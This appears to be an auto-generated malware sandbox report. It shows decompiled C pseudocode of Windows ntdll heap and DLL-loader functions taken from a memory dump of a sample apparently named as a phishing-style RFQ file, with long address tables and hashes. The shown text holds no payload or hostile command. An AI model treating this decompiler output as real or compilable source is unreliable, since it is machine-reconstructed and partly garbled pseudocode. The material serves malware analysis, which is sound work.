                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342b32a
                                                                                                                                                                                  0x3342b32a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342b32a

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • TargetNtPath, xrefs: 3342B3AF
                                                                                                                                                                                  • GlobalizationUserSettings, xrefs: 3342B3B4
                                                                                                                                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3342B3AA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                  • API String ID: 0-505981995
                                                                                                                                                                                  • Opcode ID: 5953283dd8de52323e8d87f9011908eac6d638a411dbe5aca17fd5149e55d7b2
                                                                                                                                                                                  • Instruction ID: 7280674a65ca21914c238c4091fdc04545349879862aad1a4603588529a41dae
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5953283dd8de52323e8d87f9011908eac6d638a411dbe5aca17fd5149e55d7b2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F615A72D41629AFDB219F54DC88F9ABBB8AB04714F4141E9E908FB250CB749E84CF94
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                                  			E3334F75B(void* __ecx, signed short* __edx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				signed char _t63;
				signed int _t67;
				void* _t71;
				intOrPtr _t72;
				void* _t79;
				signed char* _t82;
				intOrPtr _t83;
				signed char* _t88;
				intOrPtr _t89;
				void* _t90;
				signed char* _t93;
				void* _t126;
				signed int* _t127;

				_t127 = __edx;
				_t126 = __ecx;
				_t58 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t31 =  &(_t127[4]); // 0xddeeddfe
					E333A8140(_t31, _t58 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t63 =  *(_t126 + 0xcc) ^  *0x33446d48;
				if(_t63 == 0) {
					_t63 = E3334F858(_t127,  &_v12,  &_v8);
					if(_t63 != 0) {
						_t71 = E3334FABA( &_v12,  &_v8, 0x4000);
						_t109 = _t71;
						if(_t71 < 0) {
							_t72 =  *[fs:0x30];
							__eflags =  *(_t72 + 0xc);
							if( *(_t72 + 0xc) == 0) {
								_push("HEAP: ");
								E3334B910();
							} else {
								E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t126);
							_t63 = E3334B910("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t109);
						} else {
							_t79 = L33363C40();
							_t110 = 0x7ffe0380;
							if(_t79 != 0) {
								_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t82 = 0x7ffe0380;
							}
							if( *_t82 != 0) {
								_t83 =  *[fs:0x30];
								__eflags =  *(_t83 + 0x240) & 0x00000001;
								if(( *(_t83 + 0x240) & 0x00000001) != 0) {
									E3340F13E(_t110, _t126, _v12, _v8, 7);
								}
							}
							 *((intOrPtr*)(_t126 + 0x220)) =  *((intOrPtr*)(_t126 + 0x220)) + 1;
							 *((intOrPtr*)(_t126 + 0x240)) =  *((intOrPtr*)(_t126 + 0x240)) + 1;
							 *((intOrPtr*)(_t126 + 0x244)) =  *((intOrPtr*)(_t126 + 0x244)) + _v8;
							 *((intOrPtr*)(_t126 + 0x230)) =  *((intOrPtr*)(_t126 + 0x230)) + 1;
							if(L33363C40() != 0) {
								_t88 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t88 = _t110;
							}
							if( *_t88 != 0) {
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0x240) & 0x00000001;
								if(( *(_t89 + 0x240) & 0x00000001) != 0) {
									__eflags = L33363C40();
									if(__eflags != 0) {
										_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E3340F058(_t110, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t110 & 0x000000ff);
								}
							}
							_t90 = L33363C40();
							_t111 = 0x7ffe038a;
							if(_t90 != 0) {
								_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t93 = 0x7ffe038a;
							}
							if( *_t93 != 0) {
								__eflags = L33363C40();
								if(__eflags != 0) {
									_t111 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								}
								E3340F058(_t111, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t111 & 0x000000ff);
							}
							_t63 = _t127[0] & 0x00000013 | 0x00000008;
							_t127[0] = _t63;
						}
					}
				}
				if( *((intOrPtr*)(_t126 + 0x4c)) != 0) {
					_t127[0] = _t127[0] ^ _t127[0] ^  *_t127;
					_t67 =  *(_t126 + 0x50);
					 *_t127 =  *_t127 ^ _t67;
					return _t67;
				}
				return _t63;
			}



















                                                                                                                                                                                  0x3334f765
                                                                                                                                                                                  0x3334f768
                                                                                                                                                                                  0x3334f76a
                                                                                                                                                                                  0x3334f76d
                                                                                                                                                                                  0x3334f771
                                                                                                                                                                                  0x3334f779
                                                                                                                                                                                  0x3334f77c
                                                                                                                                                                                  0x333ae322
                                                                                                                                                                                  0x333ae326
                                                                                                                                                                                  0x333ae32b
                                                                                                                                                                                  0x333ae32b
                                                                                                                                                                                  0x3334f788
                                                                                                                                                                                  0x3334f78e
                                                                                                                                                                                  0x3334f79e
                                                                                                                                                                                  0x3334f7a5
                                                                                                                                                                                  0x3334f7b7
                                                                                                                                                                                  0x3334f7bc
                                                                                                                                                                                  0x3334f7c0
                                                                                                                                                                                  0x333ae419
                                                                                                                                                                                  0x333ae41f
                                                                                                                                                                                  0x333ae423
                                                                                                                                                                                  0x333ae442
                                                                                                                                                                                  0x333ae447
                                                                                                                                                                                  0x333ae425
                                                                                                                                                                                  0x333ae43a
                                                                                                                                                                                  0x333ae43f
                                                                                                                                                                                  0x333ae44d
                                                                                                                                                                                  0x333ae450
                                                                                                                                                                                  0x333ae453
                                                                                                                                                                                  0x333ae45a
                                                                                                                                                                                  0x3334f7c6
                                                                                                                                                                                  0x3334f7c6
                                                                                                                                                                                  0x3334f7cb
                                                                                                                                                                                  0x3334f7d2
                                                                                                                                                                                  0x333ae33d
                                                                                                                                                                                  0x3334f7d8
                                                                                                                                                                                  0x3334f7d8
                                                                                                                                                                                  0x3334f7d8
                                                                                                                                                                                  0x3334f7dd
                                                                                                                                                                                  0x333ae347
                                                                                                                                                                                  0x333ae34d
                                                                                                                                                                                  0x333ae354
                                                                                                                                                                                  0x333ae364
                                                                                                                                                                                  0x333ae364
                                                                                                                                                                                  0x333ae354
                                                                                                                                                                                  0x3334f7e3
                                                                                                                                                                                  0x3334f7ec
                                                                                                                                                                                  0x3334f7f2
                                                                                                                                                                                  0x3334f7f8
                                                                                                                                                                                  0x3334f805
                                                                                                                                                                                  0x333ae377
                                                                                                                                                                                  0x3334f80b
                                                                                                                                                                                  0x3334f80b
                                                                                                                                                                                  0x3334f80b
                                                                                                                                                                                  0x3334f810
                                                                                                                                                                                  0x333ae381
                                                                                                                                                                                  0x333ae387
                                                                                                                                                                                  0x333ae38e
                                                                                                                                                                                  0x333ae399
                                                                                                                                                                                  0x333ae39b
                                                                                                                                                                                  0x333ae3a6
                                                                                                                                                                                  0x333ae3a6
                                                                                                                                                                                  0x333ae3a6
                                                                                                                                                                                  0x333ae3c3
                                                                                                                                                                                  0x333ae3c3
                                                                                                                                                                                  0x333ae38e
                                                                                                                                                                                  0x3334f816
                                                                                                                                                                                  0x3334f81b
                                                                                                                                                                                  0x3334f822
                                                                                                                                                                                  0x333ae3d6
                                                                                                                                                                                  0x3334f828
                                                                                                                                                                                  0x3334f828
                                                                                                                                                                                  0x3334f828
                                                                                                                                                                                  0x3334f82d
                                                                                                                                                                                  0x333ae3e5
                                                                                                                                                                                  0x333ae3e7
                                                                                                                                                                                  0x333ae3f2
                                                                                                                                                                                  0x333ae3f2
                                                                                                                                                                                  0x333ae3f2
                                                                                                                                                                                  0x333ae40f
                                                                                                                                                                                  0x333ae40f
                                                                                                                                                                                  0x3334f838
                                                                                                                                                                                  0x3334f83a
                                                                                                                                                                                  0x3334f83a
                                                                                                                                                                                  0x3334f7c0
                                                                                                                                                                                  0x3334f7a5
                                                                                                                                                                                  0x3334f841
                                                                                                                                                                                  0x3334f84b
                                                                                                                                                                                  0x3334f84e
                                                                                                                                                                                  0x3334f851
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f851
                                                                                                                                                                                  0x3334f857

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 333AE435
                                                                                                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 333AE455
                                                                                                                                                                                  • HEAP: , xrefs: 333AE442
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                  • API String ID: 0-1340214556
                                                                                                                                                                                  • Opcode ID: 6be711159a751e4810a4862b5efcd87f460bc296ffe78cc391f09e981ccfb31a
                                                                                                                                                                                  • Instruction ID: aac9ae901669fc997e6da78186a6ad85cbc12ca9de9de8c02ad343d4f1347e44
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6be711159a751e4810a4862b5efcd87f460bc296ffe78cc391f09e981ccfb31a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 72510535A45784AFE311CFA8C984F6ABBF8EF04744F08C1A4E5908B6A2D774E910CB51
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33371514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                  			E33371514(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t66;
				signed int _t69;
				void* _t73;
				signed int _t75;
				char* _t78;
				intOrPtr _t79;
				signed int _t80;
				char* _t83;
				intOrPtr _t84;
				signed int _t85;
				signed int _t92;
				signed char* _t93;
				signed char _t98;
				intOrPtr _t103;
				signed int _t104;
				void* _t107;
				signed int _t118;
				intOrPtr _t119;
				intOrPtr _t120;

				_t103 = __edx;
				_v8 = __ecx;
				_t118 = 0;
				_t119 =  *((intOrPtr*)(__ecx + 0x20));
				_v16 = __edx;
				_t107 = E3335DE20(__ecx, __eflags,  *((intOrPtr*)(_t119 + 0x18)), "true", 0xe,  &_v20);
				if(_t107 != 0) {
					_t66 = _v8;
					__eflags =  *(_t66 + 0x10) & 0x00800000;
					if(( *(_t66 + 0x10) & 0x00800000) != 0) {
						L19:
						_t118 = 0xc000007b;
						L6:
						return _t118;
					}
					_t69 =  *(_t119 + 0x34) | 0x00400000;
					 *(_t119 + 0x34) = _t69;
					__eflags =  *(_t107 + 0x10) & 0x00000001;
					if(__eflags == 0) {
						goto L1;
					}
					 *(_t119 + 0x34) = _t69 | 0x01000000;
					_t118 = L33346DD0( *((intOrPtr*)(_t119 + 0x18)), __eflags);
					__eflags = _t118;
					if(_t118 < 0) {
						goto L6;
					} else {
						goto L1;
					}
					goto L19;
				}
				L1:
				if(( *(_t103 + 0x16) & 0x00002000) == 0) {
					 *(_t119 + 0x34) =  *(_t119 + 0x34) & 0xfffffffb;
					goto L6;
				}
				if(( *( *((intOrPtr*)(_t119 + 0x5c)) + 0x10) & 0x00000080) != 0) {
					__eflags =  *(_t103 + 0x5e) & 0x00000080;
					if(( *(_t103 + 0x5e) & 0x00000080) != 0) {
						goto L3;
					}
					_t98 =  *0x334437c0; // 0x0
					__eflags = _t98 & 0x00000003;
					if((_t98 & 0x00000003) != 0) {
						_t45 = _t119 + 0x24; // 0x123
						E333CE692("minkernel\\ntdll\\ldrmap.c", 0x3a2, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t45);
						_t98 =  *0x334437c0; // 0x0
					}
					__eflags = _t98 & 0x00000010;
					if((_t98 & 0x00000010) != 0) {
						asm("int3");
					}
					_t118 = 0xc0000428;
					goto L6;
				}
				L3:
				if(( *(_t119 + 0x34) & 0x01000000) != 0) {
					goto L6;
				}
				_t73 = _a4 - 0x40000003;
				if(_t73 == 0 || _t73 == 0x33) {
					_v12 =  *((intOrPtr*)(_t119 + 0x18));
					_t75 = L33363C40();
					__eflags = _t75;
					if(_t75 != 0) {
						_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t78 = 0x7ffe0384;
					}
					__eflags =  *_t78;
					_t104 = 0x7ffe0385;
					if( *_t78 != 0) {
						_t79 =  *[fs:0x30];
						__eflags =  *(_t79 + 0x240) & 0x00000004;
						if(( *(_t79 + 0x240) & 0x00000004) != 0) {
							_t92 = L33363C40();
							__eflags = _t92;
							if(_t92 == 0) {
								_t93 = 0x7ffe0385;
							} else {
								_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t93 & 0x00000020;
							if(( *_t93 & 0x00000020) != 0) {
								E333D0227(0x1490, _v12, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					__eflags = _a4 - 0x40000003;
					if(_a4 != 0x40000003) {
						L12:
						_t120 =  *((intOrPtr*)(_t119 + 0x18));
						_t80 = L33363C40();
						__eflags = _t80;
						if(_t80 != 0) {
							_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t83 = 0x7ffe0384;
						}
						__eflags =  *_t83;
						if( *_t83 != 0) {
							_t84 =  *[fs:0x30];
							__eflags =  *(_t84 + 0x240) & 0x00000004;
							if(( *(_t84 + 0x240) & 0x00000004) != 0) {
								_t85 = L33363C40();
								__eflags = _t85;
								if(_t85 != 0) {
									_t104 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
									__eflags = _t104;
								}
								__eflags =  *_t104 & 0x00000020;
								if(( *_t104 & 0x00000020) != 0) {
									E333D0227(0x1491, _t120, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						goto L6;
					} else {
						_t21 = _t119 + 0x24; // 0x123
						_v12 = _t21;
						_t118 = E3338D3EF( *((intOrPtr*)(_t119 + 0x18)),  *((intOrPtr*)(_v8 + 0x5c)), _v16, _t21);
						__eflags = _t118;
						if(_t118 < 0) {
							E3338C98F(_t118, 0x1490, 0, _v12);
							goto L6;
						}
						goto L12;
					}
				} else {
					goto L6;
				}
			}


























                                                                                                                                                                                  0x3337151f
                                                                                                                                                                                  0x33371523
                                                                                                                                                                                  0x33371526
                                                                                                                                                                                  0x33371528
                                                                                                                                                                                  0x33371536
                                                                                                                                                                                  0x3337153e
                                                                                                                                                                                  0x33371542
                                                                                                                                                                                  0x333715f5
                                                                                                                                                                                  0x333715f8
                                                                                                                                                                                  0x333715ff
                                                                                                                                                                                  0x333ba34d
                                                                                                                                                                                  0x333ba34d
                                                                                                                                                                                  0x3337157c
                                                                                                                                                                                  0x33371582
                                                                                                                                                                                  0x33371582
                                                                                                                                                                                  0x33371608
                                                                                                                                                                                  0x3337160d
                                                                                                                                                                                  0x33371610
                                                                                                                                                                                  0x33371614
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ba35f
                                                                                                                                                                                  0x333ba367
                                                                                                                                                                                  0x333ba369
                                                                                                                                                                                  0x333ba36b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ba371
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ba371
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ba36b
                                                                                                                                                                                  0x33371548
                                                                                                                                                                                  0x33371551
                                                                                                                                                                                  0x333ba376
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ba376
                                                                                                                                                                                  0x3337155e
                                                                                                                                                                                  0x333ba37f
                                                                                                                                                                                  0x333ba383
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ba389
                                                                                                                                                                                  0x333ba38e
                                                                                                                                                                                  0x333ba390
                                                                                                                                                                                  0x333ba392
                                                                                                                                                                                  0x333ba3ac
                                                                                                                                                                                  0x333ba3b1
                                                                                                                                                                                  0x333ba3b6
                                                                                                                                                                                  0x333ba3b9
                                                                                                                                                                                  0x333ba3bb
                                                                                                                                                                                  0x333ba3bd
                                                                                                                                                                                  0x333ba3bd
                                                                                                                                                                                  0x333ba3be
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ba3be
                                                                                                                                                                                  0x33371564
                                                                                                                                                                                  0x3337156b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33371570
                                                                                                                                                                                  0x33371575
                                                                                                                                                                                  0x33371588
                                                                                                                                                                                  0x3337158b
                                                                                                                                                                                  0x33371590
                                                                                                                                                                                  0x33371592
                                                                                                                                                                                  0x333ba3d1
                                                                                                                                                                                  0x33371598
                                                                                                                                                                                  0x33371598
                                                                                                                                                                                  0x33371598
                                                                                                                                                                                  0x3337159d
                                                                                                                                                                                  0x333715a0
                                                                                                                                                                                  0x333715a5
                                                                                                                                                                                  0x333ba3db
                                                                                                                                                                                  0x333ba3e1
                                                                                                                                                                                  0x333ba3e8
                                                                                                                                                                                  0x333ba3ee
                                                                                                                                                                                  0x333ba3f3
                                                                                                                                                                                  0x333ba3f5
                                                                                                                                                                                  0x333ba407
                                                                                                                                                                                  0x333ba3f7
                                                                                                                                                                                  0x333ba400
                                                                                                                                                                                  0x333ba400
                                                                                                                                                                                  0x333ba409
                                                                                                                                                                                  0x333ba40c
                                                                                                                                                                                  0x333ba422
                                                                                                                                                                                  0x333ba422
                                                                                                                                                                                  0x333ba40c
                                                                                                                                                                                  0x333ba3e8
                                                                                                                                                                                  0x333715ab
                                                                                                                                                                                  0x333715b2
                                                                                                                                                                                  0x333715d6
                                                                                                                                                                                  0x333715d6
                                                                                                                                                                                  0x333715d9
                                                                                                                                                                                  0x333715de
                                                                                                                                                                                  0x333715e0
                                                                                                                                                                                  0x333ba44b
                                                                                                                                                                                  0x333715e6
                                                                                                                                                                                  0x333715e6
                                                                                                                                                                                  0x333715e6
                                                                                                                                                                                  0x333715eb
                                                                                                                                                                                  0x333715ee
                                                                                                                                                                                  0x333ba455
                                                                                                                                                                                  0x333ba45b
                                                                                                                                                                                  0x333ba462
                                                                                                                                                                                  0x333ba468
                                                                                                                                                                                  0x333ba46d
                                                                                                                                                                                  0x333ba46f
                                                                                                                                                                                  0x333ba47a
                                                                                                                                                                                  0x333ba47a
                                                                                                                                                                                  0x333ba47a
                                                                                                                                                                                  0x333ba480
                                                                                                                                                                                  0x333ba483
                                                                                                                                                                                  0x333ba498
                                                                                                                                                                                  0x333ba498
                                                                                                                                                                                  0x333ba483
                                                                                                                                                                                  0x333ba462
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333715b4
                                                                                                                                                                                  0x333715b7
                                                                                                                                                                                  0x333715be
                                                                                                                                                                                  0x333715cc
                                                                                                                                                                                  0x333715ce
                                                                                                                                                                                  0x333715d0
                                                                                                                                                                                  0x333ba438
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ba438
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333715d0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 333BA3A7
                                                                                                                                                                                  • LdrpCompleteMapModule, xrefs: 333BA39D
                                                                                                                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 333BA396
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                  • API String ID: 0-1676968949
                                                                                                                                                                                  • Opcode ID: c0b9900f34d3a9b27cdba8cc93661eab89f35a203765b1ed5465f4bbf88d93b6
                                                                                                                                                                                  • Instruction ID: a2a57e7993f8aad1594b11fbafe65aeccb7b2cbeaad16024dc16f5860fa2fb78
                                                                                                                                                                                  • Opcode Fuzzy Hash: c0b9900f34d3a9b27cdba8cc93661eab89f35a203765b1ed5465f4bbf88d93b6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9551E576E40B419BEB15CF58CD84B157BE8AF007B4F14C158E8929BBD1DB78E940CB51
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333FD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                                  			E333FD62C(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed int _t52;
				intOrPtr _t53;
				signed int _t63;
				signed short _t64;
				intOrPtr _t67;
				signed short _t71;
				signed int _t74;
				signed short _t75;
				signed short _t77;
				void* _t81;
				signed int _t82;
				signed int _t83;
				signed char _t92;
				unsigned int _t97;
				unsigned int _t102;
				signed int _t106;
				void* _t108;
				void* _t109;
				unsigned int _t112;

				_t82 = __ecx;
				_push(__ecx);
				_t112 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t71 =  *__edx;
							if(( *(__ecx + 0x4c) & _t71) != 0) {
								_t71 = _t71 ^  *(__ecx + 0x50);
							}
							_t44 = _t71 & 0x0000ffff;
						}
					} else {
						_t102 = __edx >> 0x00000003 ^  *__edx ^  *0x33446964 ^ __ecx;
						if(_t102 == 0) {
							_t74 =  *((intOrPtr*)(__edx - (_t102 >> 0xd)));
						} else {
							_t74 = 0;
						}
						_t44 =  *((intOrPtr*)(_t74 + 0x14));
					}
					_t92 =  *((intOrPtr*)(_t112 + 7));
					_t106 = _t44 & 0xffff;
					if(_t92 != 5) {
						if((_t92 & 0x00000040) == 0) {
							if((_t92 & 0x0000003f) == 0x3f) {
								if(_t92 >= 0) {
									if( *(_t82 + 0x4c) == 0) {
										_t48 =  *_t112 & 0x0000ffff;
									} else {
										_t64 =  *_t112;
										if(( *(_t82 + 0x4c) & _t64) != 0) {
											_t64 = _t64 ^  *(_t82 + 0x50);
										}
										_t48 = _t64 & 0x0000ffff;
									}
								} else {
									_t97 = _t112 >> 0x00000003 ^  *_t112 ^  *0x33446964 ^ _t82;
									if(_t97 == 0) {
										_t67 =  *((intOrPtr*)(_t112 - (_t97 >> 0xd)));
									} else {
										_t67 = 0;
									}
									_t48 =  *((intOrPtr*)(_t67 + 0x14));
								}
								_t83 =  *(_t112 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t83 = _t92 & 0x3f;
							}
						} else {
							_t83 =  *(_t112 + 4 + (_t92 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t83 =  *(_t82 + 0x54) & 0x0000ffff ^  *(_t112 + 4) & 0x0000ffff;
					}
					_t108 = (_t106 << 3) - _t83;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t75 =  *__edx & 0x0000ffff;
					} else {
						_t77 =  *__edx;
						if(( *(__ecx + 0x4c) & _t77) != 0) {
							_t77 = _t77 ^  *(__ecx + 0x50);
						}
						_t75 = _t77 & 0x0000ffff;
					}
					_t108 =  *((intOrPtr*)(_t112 - 8)) - (_t75 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t112 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t63 = _t51 & 0x3f;
					goto L38;
				} else {
					_t63 =  *(_t112 + 6) & 0x000000ff;
					L38:
					_t52 = _t63 << 3;
					L42:
					_t109 = _t108 + _t52;
					_t35 = _t112 + 8; // -16
					_t81 = _t35 + _t109;
					_t53 = E333A8050(_t81, 0x333272b8, 8);
					_v8 = _t53;
					if(_t53 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3334B910();
					} else {
						E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t109);
					_push(_v8 + _t81);
					E3334B910("Heap block at %p modified at %p past requested size of %Ix\n", _t112);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x334447a1 = 1;
						asm("int3");
						 *0x334447a1 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                                                                                                                                                  0x333fd62c
                                                                                                                                                                                  0x333fd631
                                                                                                                                                                                  0x333fd634
                                                                                                                                                                                  0x333fd637
                                                                                                                                                                                  0x333fd63c
                                                                                                                                                                                  0x333fd7de
                                                                                                                                                                                  0x333fd7de
                                                                                                                                                                                  0x333fd7e0
                                                                                                                                                                                  0x333fd7e4
                                                                                                                                                                                  0x333fd7e4
                                                                                                                                                                                  0x333fd644
                                                                                                                                                                                  0x333fd66d
                                                                                                                                                                                  0x333fd698
                                                                                                                                                                                  0x333fd6a9
                                                                                                                                                                                  0x333fd69a
                                                                                                                                                                                  0x333fd69a
                                                                                                                                                                                  0x333fd69f
                                                                                                                                                                                  0x333fd6a1
                                                                                                                                                                                  0x333fd6a1
                                                                                                                                                                                  0x333fd6a4
                                                                                                                                                                                  0x333fd6a4
                                                                                                                                                                                  0x333fd66f
                                                                                                                                                                                  0x333fd67a
                                                                                                                                                                                  0x333fd67f
                                                                                                                                                                                  0x333fd68c
                                                                                                                                                                                  0x333fd681
                                                                                                                                                                                  0x333fd681
                                                                                                                                                                                  0x333fd681
                                                                                                                                                                                  0x333fd68e
                                                                                                                                                                                  0x333fd68e
                                                                                                                                                                                  0x333fd6ac
                                                                                                                                                                                  0x333fd6b2
                                                                                                                                                                                  0x333fd6b8
                                                                                                                                                                                  0x333fd6c9
                                                                                                                                                                                  0x333fd6de
                                                                                                                                                                                  0x333fd6ea
                                                                                                                                                                                  0x333fd717
                                                                                                                                                                                  0x333fd728
                                                                                                                                                                                  0x333fd719
                                                                                                                                                                                  0x333fd719
                                                                                                                                                                                  0x333fd71e
                                                                                                                                                                                  0x333fd720
                                                                                                                                                                                  0x333fd720
                                                                                                                                                                                  0x333fd723
                                                                                                                                                                                  0x333fd723
                                                                                                                                                                                  0x333fd6ec
                                                                                                                                                                                  0x333fd6f9
                                                                                                                                                                                  0x333fd6fe
                                                                                                                                                                                  0x333fd70b
                                                                                                                                                                                  0x333fd700
